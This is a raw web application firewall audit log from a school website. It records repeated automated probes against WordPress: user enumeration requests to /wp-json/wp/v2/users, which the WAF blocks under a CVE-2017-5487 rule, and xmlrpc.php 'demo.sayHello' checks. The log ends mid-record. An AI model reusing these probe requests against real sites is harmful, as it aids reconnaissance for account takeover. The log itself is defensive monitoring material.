userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656639312191 5851 (- - -) Stopwatch2: 1746656639312191 5851; combined=4274, p1=537, p2=3515, p3=28, p4=29, p5=96, sr=84, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b3ef403-Z-- --a5aac568-A-- [08/May/2025:05:25:22 +0700] aBvd0sP9GxxPAbCroFbL5wAAAFg 103.236.140.4 39382 103.236.140.4 8181 --a5aac568-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5aac568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5aac568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656722297741 3567 (- - -) Stopwatch2: 1746656722297741 3567; combined=1507, p1=514, p2=952, p3=0, p4=0, p5=40, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5aac568-Z-- --9e4c5a61-A-- [08/May/2025:05:25:27 +0700] aBvd18P9GxxPAbCroFbL6QAAAEU 103.236.140.4 39386 103.236.140.4 8181 --9e4c5a61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9e4c5a61-C-- demo.sayHello --9e4c5a61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e4c5a61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656727922655 5469 (- - -) Stopwatch2: 1746656727922655 5469; combined=4122, p1=561, p2=3345, p3=29, p4=32, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e4c5a61-Z-- --75f48258-A-- [08/May/2025:05:32:23 +0700] aBvfd8P9GxxPAbCroFbL7gAAAEQ 103.236.140.4 39408 103.236.140.4 8181 --75f48258-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.116.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.116.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --75f48258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75f48258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657143845295 3637 (- - -) Stopwatch2: 1746657143845295 3637; combined=1571, p1=516, p2=1015, p3=0, p4=0, p5=40, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75f48258-Z-- --2a861e02-A-- [08/May/2025:05:33:49 +0700] aBvfzSs5rYyn3jlLjjK9eQAAANQ 103.236.140.4 39412 103.236.140.4 8181 --2a861e02-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a861e02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a861e02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657229003380 2838 (- - -) Stopwatch2: 1746657229003380 2838; combined=1228, p1=424, p2=774, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a861e02-Z-- --a617f142-A-- [08/May/2025:05:33:52 +0700] aBvf0MP9GxxPAbCroFbL8QAAAEY 103.236.140.4 39416 103.236.140.4 8181 --a617f142-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a617f142-C-- demo.sayHello --a617f142-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a617f142-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657232777558 5449 (- - -) Stopwatch2: 1746657232777558 5449; combined=4145, p1=507, p2=3413, p3=29, p4=32, p5=96, sr=72, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a617f142-Z-- --7ed7e524-A-- [08/May/2025:05:35:56 +0700] aBvgTMP9GxxPAbCroFbL9wAAAEA 103.236.140.4 39434 103.236.140.4 8181 --7ed7e524-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ed7e524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ed7e524-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657356336259 2920 (- - -) Stopwatch2: 1746657356336259 2920; combined=1319, p1=442, p2=846, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ed7e524-Z-- --af00e02f-A-- [08/May/2025:05:36:01 +0700] aBvgUcP9GxxPAbCroFbL-wAAAEo 103.236.140.4 39442 103.236.140.4 8181 --af00e02f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af00e02f-C-- demo.sayHello --af00e02f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af00e02f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657361377841 6069 (- - -) Stopwatch2: 1746657361377841 6069; combined=4375, p1=562, p2=3583, p3=31, p4=34, p5=97, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af00e02f-Z-- --0eeba957-A-- [08/May/2025:05:36:43 +0700] aBvge8P9GxxPAbCroFbMAQAAAE8 103.236.140.4 39456 103.236.140.4 8181 --0eeba957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0eeba957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eeba957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657403590177 2856 (- - -) Stopwatch2: 1746657403590177 2856; combined=1241, p1=424, p2=786, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eeba957-Z-- --b8b34056-A-- [08/May/2025:05:36:50 +0700] aBvggsP9GxxPAbCroFbMAwAAAEw 103.236.140.4 39460 103.236.140.4 8181 --b8b34056-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8b34056-C-- demo.sayHello --b8b34056-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8b34056-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657410103051 5430 (- - -) Stopwatch2: 1746657410103051 5430; combined=4009, p1=508, p2=3277, p3=25, p4=27, p5=100, sr=95, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8b34056-Z-- --c2225365-A-- [08/May/2025:05:37:10 +0700] aBvglsP9GxxPAbCroFbMBgAAAEk 103.236.140.4 39466 103.236.140.4 8181 --c2225365-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.252.18.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.252.18.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2225365-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2225365-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657430890976 3085 (- - -) Stopwatch2: 1746657430890976 3085; combined=1303, p1=436, p2=837, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2225365-Z-- --412ad450-A-- [08/May/2025:05:39:11 +0700] aBvhDys5rYyn3jlLjjK9egAAANE 103.236.140.4 39486 103.236.140.4 8181 --412ad450-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --412ad450-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --412ad450-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657551896339 12884 (- - -) Stopwatch2: 1746657551896339 12884; combined=21066, p1=433, p2=843, p3=0, p4=0, p5=9911, sr=75, sw=0, l=0, gc=9879 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --412ad450-Z-- --8f295a40-A-- [08/May/2025:05:39:18 +0700] aBvhFqcs1DvJ_HgMHE_wfwAAAAI 103.236.140.4 39492 103.236.140.4 8181 --8f295a40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f295a40-C-- demo.sayHello --8f295a40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f295a40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657558188121 5407 (- - -) Stopwatch2: 1746657558188121 5407; combined=4090, p1=572, p2=3304, p3=29, p4=25, p5=93, sr=158, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f295a40-Z-- --e0593e52-A-- [08/May/2025:05:40:47 +0700] aBvhb8P9GxxPAbCroFbMCwAAAEU 103.236.140.4 39504 103.236.140.4 8181 --e0593e52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0593e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0593e52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657647171059 2985 (- - -) Stopwatch2: 1746657647171059 2985; combined=1348, p1=460, p2=849, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0593e52-Z-- --16f97d65-A-- [08/May/2025:05:40:53 +0700] aBvhdcP9GxxPAbCroFbMDQAAAFA 103.236.140.4 39508 103.236.140.4 8181 --16f97d65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16f97d65-C-- demo.sayHello --16f97d65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16f97d65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657653485072 5917 (- - -) Stopwatch2: 1746657653485072 5917; combined=4369, p1=533, p2=3604, p3=28, p4=32, p5=100, sr=73, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16f97d65-Z-- --ec6a483c-A-- [08/May/2025:05:46:25 +0700] aBviwacs1DvJ_HgMHE_whQAAAAs 103.236.140.4 39544 103.236.140.4 8181 --ec6a483c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ec6a483c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec6a483c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657985565746 3241 (- - -) Stopwatch2: 1746657985565746 3241; combined=1435, p1=506, p2=897, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec6a483c-Z-- --f2864b3c-A-- [08/May/2025:05:46:30 +0700] aBvixqcs1DvJ_HgMHE_whwAAABA 103.236.140.4 39548 103.236.140.4 8181 --f2864b3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f2864b3c-C-- demo.sayHello --f2864b3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2864b3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657990950180 5072 (- - -) Stopwatch2: 1746657990950180 5072; combined=3974, p1=488, p2=3262, p3=32, p4=34, p5=93, sr=68, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2864b3c-Z-- --36e8fb79-A-- [08/May/2025:05:47:12 +0700] aBvi8Kcs1DvJ_HgMHE_wiQAAABM 103.236.140.4 39552 103.236.140.4 8181 --36e8fb79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 